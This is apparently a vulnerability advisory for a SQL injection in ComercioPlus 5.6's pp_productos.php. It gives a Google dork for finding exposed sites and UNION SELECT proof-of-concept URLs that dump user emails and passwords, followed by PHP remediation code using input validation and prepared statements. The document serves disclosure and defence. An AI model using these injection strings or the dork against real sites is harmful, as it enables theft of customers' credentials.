ComercioPlus 5.6 SQL injection vulnerability and fix

2011-01-29T00:00:00
ID MYHACK58:62201128964
Type myhack58
Reporter Anonymous
Modified 2011-01-29T00:00:00

Description

ComercioPlus is a virtual store system written in PHP. In ComercioPlus 5.6, the pp_productos.php file contains an SQL injection vulnerability that may lead to disclosure of sensitive information.

[+]info: ~~~~~~~~~

Exploit Title: Comerciosonline CMS SQLi

Google Dork: allintext: "Servicio ofrecido por ComerciosOnLine"

Date: 27/01/2011

Author: Daniel Godoy

Author Mail: DanielGodoy[at]GobiernoFederal[dot]com

Author Web: www.delincuentedigital.com.ar

Software Link: <http://www.comerciosonline.com/index.php?p=8>

Version: All

Tested on: Linux, Windows

[+]poc: ~~~~~~~~~

http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--

http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--

[+]Reference: ~~~~~~~~~

<http://www.exploit-db.com/exploits/16060>

Fix: filter the input handled by pp_productos.php.
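
One way to implement the filtering the fix calls for, shown as an added example that is not ComercioPlus source code: the numeric parameters are validated as integers and then bound to a prepared statement. The table `productos_demo`, its columns, and the functions `demo_db`, `filter_id` and `list_products` are assumptions made for illustration; `tipo` and `codf` are the parameter names from the PoC URL.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the store database (table and column names are assumptions).
function demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE productos_demo (codf INTEGER, tipo INTEGER, nombre TEXT)');
    $db->exec("INSERT INTO productos_demo VALUES (7, 1, 'Sample product')");
    return $db;
}

// Filter step: accept only a positive decimal integer, reject everything else.
function filter_id($raw): ?int {
    if (!is_string($raw)) {           // array input such as codf[]=1 is rejected here
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Query step: values are bound as parameters, never concatenated into the SQL text.
function list_products(PDO $db, $rawTipo, $rawCodf): array {
    $tipo = filter_id($rawTipo);
    $codf = filter_id($rawCodf);
    if ($tipo === null || $codf === null) {
        return [];                    // the caller should answer with HTTP 400
    }
    $stmt = $db->prepare(
        'SELECT nombre FROM productos_demo WHERE tipo = :tipo AND codf = :codf'
    );
    $stmt->bindValue(':tipo', $tipo, PDO::PARAM_INT);
    $stmt->bindValue(':codf', $codf, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = demo_db();
// Constructed inputs: a legitimate id, then the value shape shown in the PoC above.
foreach (['7', '-1 UNION SELECT 1,2,3,4,5--'] as $codf) {
    $rows = list_products($db, '1', $codf);
    printf("codf=%s -> %s\n", var_export($codf, true), json_encode($rows));
}
```

The integer check alone stops the PoC value; binding the parameters as well keeps the query safe if a later change loosens the validation.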